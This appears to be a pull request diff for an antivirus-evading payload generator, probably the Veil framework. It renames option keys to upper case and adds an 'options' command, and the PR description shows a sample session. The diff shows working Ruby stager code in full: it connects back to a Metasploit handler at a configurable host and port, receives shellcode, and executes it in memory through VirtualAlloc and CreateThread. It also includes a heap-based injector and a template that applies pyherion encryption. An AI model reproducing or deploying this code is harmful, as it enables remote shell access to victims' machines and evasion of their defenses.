+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "LHOST"          : ["", "IP of the Metasploit handler"],
+                                    "LPORT"          : ["4444", "Port of the Metasploit handler"]
+                                }
 
     def generate(self):
 
         payloadCode = "require 'rubygems';require 'win32/api';require 'socket';include Win32\n"
         payloadCode += "exit if Object.const_defined?(:Ocra)\n"
-        
+
         payloadCode += "$v = API.new('VirtualAlloc', 'IIII', 'I');$r = API.new('RtlMoveMemory', 'IPI', 'V');$c = API.new('CreateThread', 'IIIIIP', 'I');$w = API.new('WaitForSingleObject', 'II', 'I')\n"
         payloadCode += "$g_o = API.new('_get_osfhandle', 'I', 'I', 'msvcrt.dll')\n"
-        
+
         payloadCode += "def g(ip,port)\n"
         payloadCode += "\tbegin\n"
         payloadCode += "\t\ts = TCPSocket.open(ip, port)\n"
@@ -45,14 +47,14 @@ class Payload:
         payloadCode += "\t\tfor i in 1..4\n\t\t\tp[i] = Array(sd).pack('V')[i-1] end\n"
         payloadCode += "\t\treturn p\n"
         payloadCode += "\trescue\n\treturn \"\"\n\tend\nend\n"
-        
+
         payloadCode += "def ij(sc)\n"
         payloadCode += "\tif sc.length > 1000\n"
         payloadCode += "\t\tpt = $v.call(0,(sc.length > 0x1000 ? sc.length : 0x1000), 0x1000, 0x40)\n"
         payloadCode += "\t\tx = $r.call(pt,sc,sc.length)\n"
         payloadCode += "\t\tx = $w.call($c.call(0,0,pt,0,0,0),0xFFFFFFF)\n"
         payloadCode += "\tend\nend\n"
-        
+
         payloadCode += "ij(g(\"%s\",%s))" % (self.required_options["LHOST"][0], self.required_options["LPORT"][0])
 
         return payloadCode

--- a/modules/payloads/ruby/shellcode_inject/flat.py
+++ b/modules/payloads/ruby/shellcode_inject/flat.py
@@ -26,8 +26,10 @@ class Payload:
         self.shellcode = shellcode.Shellcode()
 
         # options we require user ineraction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "inject_method" : ["Virtual", "Virtual, or Heap"]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, or Heap"]
+                                }
 
     def generate(self):
 
@@ -44,13 +46,13 @@ class Payload:
         payloadCode += "include Win32\n"
         payloadCode += "exit if Object.const_defined?(:Ocra)\n"
 
-        if self.required_options["inject_method"][0].lower() == "virtual":
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
             payloadCode += "v = API.new('VirtualAlloc', 'IIII', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
             payloadCode += "%s = \"%s\"\n" %(payloadName, Shellcode)
             payloadCode += "%s = v.call(0,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
             payloadCode += "x = r.call(%s,%s,%s.length); %s = c.call(0,0,%s,0,0,0); x = w.call(%s,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)
 
-        elif self.required_options["inject_method"][0].lower() == "heap":
+        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
             payloadCode += "v = API.new('HeapCreate', 'III', 'I');q = API.new('HeapAlloc', 'III', 'I');r = API.new('RtlMoveMemory', 'IPI', 'V');c = API.new('CreateThread', 'IIIIIP', 'I');w = API.new('WaitForSingleObject', 'II', 'I')\n"
             payloadCode += "%s = \"%s\"\n" %(payloadName, Shellcode)
             payloadCode += "%s = v.call(0x0004,(%s.length > 0x1000 ? %s.length : 0x1000), 0)\n" %(heap_name,payloadName,payloadName)

--- a/modules/payloads/template.py
+++ b/modules/payloads/template.py
@@ -24,20 +24,21 @@ import settings
 
 # Main class must be titled "Payload"
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "description"
         self.language = "python/cs/powershell/whatever"
         self.rating = "Poor/Normal/Good/Excellent"
         self.extension = "py/cs/c/etc."
-        
+
         self.shellcode = shellcode.Shellcode()
-        # options we require user ineraction for- format is {Option : [Value, Description]]}
+        # options we require user ineraction for- format is {OPTION : [Value, Description]]}
         # the code logic will parse any of these out and require the user to input a value for them
         self.required_options = {
-                        "compile_to_exe" : ["Y", "Compile to an executable"],
-                        "use_pyherion" : ["N", "Use the pyherion encrypter"]}
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"]
+                                }
 
         # an option note to be displayed to the user after payload generation
         # i.e. additional compile notes, or usage warnings
@@ -45,18 +46,18 @@ class Payload:
 
     # main method that returns the generated payload code
     def generate(self):
-        
+
         # Generate Shellcode Using msfvenom
         Shellcode = self.shellcode.generate()
-        
+
         # build our your payload sourcecode
         PayloadCode = "..."
 
         # add in a randomized string
         PayloadCode += helpers.randomString()
-        
+
         # example of how to check the internal options
-        if self.required_options["use_pyherion"][0].lower() == "y":
+        if self.required_options["USE_PYHERION"][0].lower() == "y":
             PayloadCode = encryption.pyherion(PayloadCode)
 
         # return everything


### PR DESCRIPTION
+ Fix for 4d6eb5167ae2a51fb9050432cb678becc404320a
  + It wasn't working with mixed cased
+ Add 'options' to show information about current set values.

```
 [>] Please enter a command: set lHost 127.0.0.1
 [i] LHOST => 127.0.0.1
 [>] Please enter a command: options

 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 LHOST           	127.0.0.1	IP of the metasploit handler
 LPORT           	        	Port of the metasploit handler
 compile_to_exe  	Y       	Compile to an executable

 [>] Please enter a command: set lPOrT 443
 [i] LPORT => 443
 [>] Please enter a command: options

 Required Options:

 Name			Current Value	Description
 ----			-------------	-----------
 LHOST           	127.0.0.1	IP of the metasploit handler
 LPORT           	443     	Port of the metasploit handler
 compile_to_exe  	Y       	Compile to an executable

 [>] Please enter a command:
```
